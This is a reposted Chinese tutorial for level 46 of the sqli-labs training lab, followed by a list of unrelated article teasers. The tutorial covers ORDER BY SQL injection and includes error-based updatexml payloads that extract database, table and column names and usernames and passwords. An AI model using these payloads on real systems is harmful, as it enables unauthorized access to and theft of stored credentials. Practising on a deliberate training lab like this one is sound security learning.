sqllabs第46关 order by 注入

sqllabs第46关 order by 注入

article2024/11/16 4:47:29/文章来源:https://blog.csdn.net/weixin_71398630/article/details/136220666

简介：（order by注入-错误回显-POST注入）

请求方法：POST

方法：order by注入+错误回显+数字型注入

先了解下 order by参数注入：

order by 注入是指其后面的参数是可控的，

order by 不同于我们在 where 后的注入点，不能使用 union 等注入，其后可以跟接报错注入或者时间盲注。

判断库名：
?sort=-1 and updatexml(1,concat(0x7e,database(),0x7e),1)
判断表名：
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)
判断字段名：
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)
查询数据：
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users),0x7e),1)

1.第四十六关可以看到提示： Please input parameter as SORT with numeric value

用数字形式输入sort排序参数

2.尝试加上' 看看是否存在报错注入。

数字型order by注入时,语句order by=2 and 1=2,和order by=2 and 1=1显示的结果一样,所以无法用来判断注入点类型

而用rand()会显示不同的排序结果

当在字符型中用?sort=rand(),则不会有效果,排序不会改变

因此用rand()可判断注入点类型

3.判断字段数发现到第四个回显时报错，说明只有三个字段,当我们使用 sort=1 时表格以第一列进行排列，sort=2 时表格以第二列进行排列， sort=3 时表格以第三列进行排序。

4.库名、表名、字段、数据：

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/400444.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

相关文章

Java最全面试总结——5. MyBatis篇

Java最全面试总结——5. MyBatis篇

1、什么是MyBatis （1）Mybatis是一个半ORM（对象关系映射）框架，它内部封装了JDBC，开发时只需要关注SQL 语句本身，不需要花费精力去处理加载驱动、创建连接、创建statement等繁杂的过程。程序员直…

阅读更多...

计算机网络基础之计算机网络组成与分类

计算机网络基础之计算机网络组成与分类

计算机网络基础计算机网络是计算机技术与通信技术发展相结合的产物，并在用户需求的促进下得到进一步的发展。通信技术为计算机之间的数据传输和交换提供了必需的手段，而计算机技术又渗透到了通信领域，提高了通信网络的性能。计算机网络的…

阅读更多...

一个简短的补充------对链表练习题的补充补充

一个简短的补充------对链表练习题的补充补充

昨天不是写了一篇有关链表的数据结构练习题嘛，其实那篇文章的第二道题还有许多值得我们思考的东西，今天就在这做一个简短的补充。补充一下运用那道题解决另一道题。给大家看一下绿色让眼睛放松一下。给定一个链表的头节点 head ，返回链表…

阅读更多...

十三：集合

十三：集合

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录 01、Java 集合框架概述1.1、集合框架与数组的对比及概述1.2、集合框架涉及到的API 02、Collection接口方法2.1、Collection接口中的常用方法12.2、Collection接口中…

阅读更多...

在Discord上添加自己的服务器并邀请midjourney机器人加入

在Discord上添加自己的服务器并邀请midjourney机器人加入

我开发的chatgpt网站： https://chat.xutongbao.top

阅读更多...

【机器学习案例5】语言建模 - 最常见的预训练任务一览表

【机器学习案例5】语言建模 - 最常见的预训练任务一览表

自监督学习 (SSL) 是基于 Transformer 的预训练语言模型的支柱，该范例涉及解决有助于建模自然语言的预训练任务 (PT)。本文将所有流行的预训练任务放在一起，以便我们一目了然地评估它们。 SSL 中的损失函数这里的损失函数只是模型训练的各个预训练任务损失的加权和。以BE…

阅读更多...

【智能家居】7、主程序编写+实现语音、网络和串口功能

【智能家居】7、主程序编写+实现语音、网络和串口功能

需要毕业论文私信有偿获取截止目前mainPro.c代码 #include <stdio.h> #include <string.h>#include "controlDevices.h" #include "inputCmd.h"struct Devices *findDevicesName(char *name,struct Devices *phead){struct Devices *tmp=ph…

阅读更多...

互联网上的音频和视频服务

互联网上的音频和视频服务

1 互联网上的音频和视频服务概述许多用户开始利用互联网传送音频/视频信息。在许多情况下，这种音频/视频常称为多媒体信息。多媒体信息：内容上相互关联的文本、图形、图像、声音、动画和活动图像等所形成的复合数据信息。多媒体信息的两个最主要…

阅读更多...

【Python】2019年蓝桥杯省赛真题——完全二叉树的权值

【Python】2019年蓝桥杯省赛真题——完全二叉树的权值

蓝桥杯 2019 省 A&B：完全二叉树的权值题目描述给定一棵包含 N N N 个节点的完全二叉树，树上每个节点都有一个权值，按从上到下、从左到右的顺序依次是 A 1 , A 2 , ⋯ A N A_1,A_2, \cdots A_N A1,A2,⋯AN，如下图所…

阅读更多...

ueditor编辑器中的span标签被过滤处理办法

ueditor编辑器中的span标签被过滤处理办法

问题：我编辑指南的时候，给指南加了个span标签，并设置了id的属性， <span idhash_tag_location_11></span>;但是我编辑完以后，查看的时候发现span没了，id属性都消失了解决过程 1、优先想到的是…

阅读更多...

一个PDF处理利器的.Net开源项目

一个PDF处理利器的.Net开源项目

在项目开发中，处理PDF文件是一个非常常见的需求，之前也推荐几个，今天继续给大家推荐一个强大且易于使用的开源库，专门用于处理PDF文件，它提供了一系列功能强大的工具，帮助开发人员轻松地解析、修改和创建PD…

阅读更多...

碳化硅晶片C面和硅面详解

碳化硅晶片C面和硅面详解

SiC是一种Si元素和C元素以1:1比例形成的二元化合物，即百分之五十的硅（Si）和百分之五十的碳（C），其基本结构单元为 Si-C 四面体。举个例子，Si原子直径大，相当于苹果，C原子…

阅读更多...

NAS系统折腾记 | 黑群晖系统快速制作英特尔核显补丁支持硬解

NAS系统折腾记 | 黑群晖系统快速制作英特尔核显补丁支持硬解

常见的群晖机器，例如 DS920，DS918，系统内核一直是 4.4 的，而这个内核自带的核显驱动最高支持到 9 代，支持的CPU型号分别是J3455（DS918）和J4155（DS920）。而目前DIY搭建NAS…

阅读更多...

【八股文面试】Java基础常见面试题总结(上)

【八股文面试】Java基础常见面试题总结(上)

Java基础常见面试题总结(上) Java有哪些特性简单易学；面向对象（封装，继承，多态）；平台无关性（ Java 虚拟机实现平台无关性）；支持多线程（ C 语言没有内置的多…

阅读更多...

Nginx-----------高性能的 Web服务端 location 优先级（二）

Nginx-----------高性能的 Web服务端 location 优先级（二）

一、event事件 events {worker_connections 65536; #设置单个工作进程的最大并发连接数use epoll;#使用epoll事件驱动，Nginx支持众多的事件驱动，比如:select、poll、epoll，只能设置在events模块中设置。accept_mutex on; #on为同一时刻一个…

阅读更多...

【二叉树层序遍历】【队列】Leetcode 102 107 199 637 429 515 116 117 104 111

【二叉树层序遍历】【队列】Leetcode 102 107 199 637 429 515 116 117 104 111

【二叉树层序遍历】【队列】Leetcode 102 107 199 637 429 515 116 117 102. 二叉树的层序遍历解法用队列实现107. 二叉树的层序遍历 II解法199. 二叉树的右视图解法637. 二叉树的层平均值解法429. N叉树的层序遍历515. 在每个树行中找最大值116. 填充每个节点的下一个右侧节…

阅读更多...

如何用微软画图把1280X720的图片压缩成4:3?

如何用微软画图把1280X720的图片压缩成4:3?

最近在看20多年前的电视剧，视频截图是1280X720，比例失调。如何压缩成4:3？ 4 / 3 W / 720 W 720 X 4 / 3 960 打开画图，调整大学和扭曲（Ctrl W），依据选择像素，取消保持纵横比…

阅读更多...

JVM原理学习

JVM原理学习

一.栈上的数据存储P95 二.堆上的数据存储标记字段指针压缩(节省空间内存对齐(提高CPU缓存行效率字段重排列方便内存对齐类排在基本类型之后三.JIT实时编译优化手段 C2编译器，直接将循环相加求和优化为乘法。方法内联逃逸分析四.G1垃圾回收器原理年轻代…

阅读更多...

【学习总结】慢SQL治理经验总结

【学习总结】慢SQL治理经验总结

一、慢SQL定义执行超过1s的SQL为慢SQL 三、慢SQl的风险系统的响应时间延迟，影响用户体验资源占用增加，增高了系统的负载，其他请求响应时间也可能会收到影响。慢SQL占用数据库连接的时间长,如果有大量慢SQL查询同时执行，可能…

阅读更多...

阿里云 OSS

阿里云 OSS

阿里云对象存储服务（Object Storage Service，简称 OSS） OSS 为 Object Storage Service，即对象存储服务。是阿里云提供的海量、安全、低成本、高可靠的云存储服务。 OSS 具有与平台无关的 RESTful API 接口，可以在任…

阅读更多...

最新文章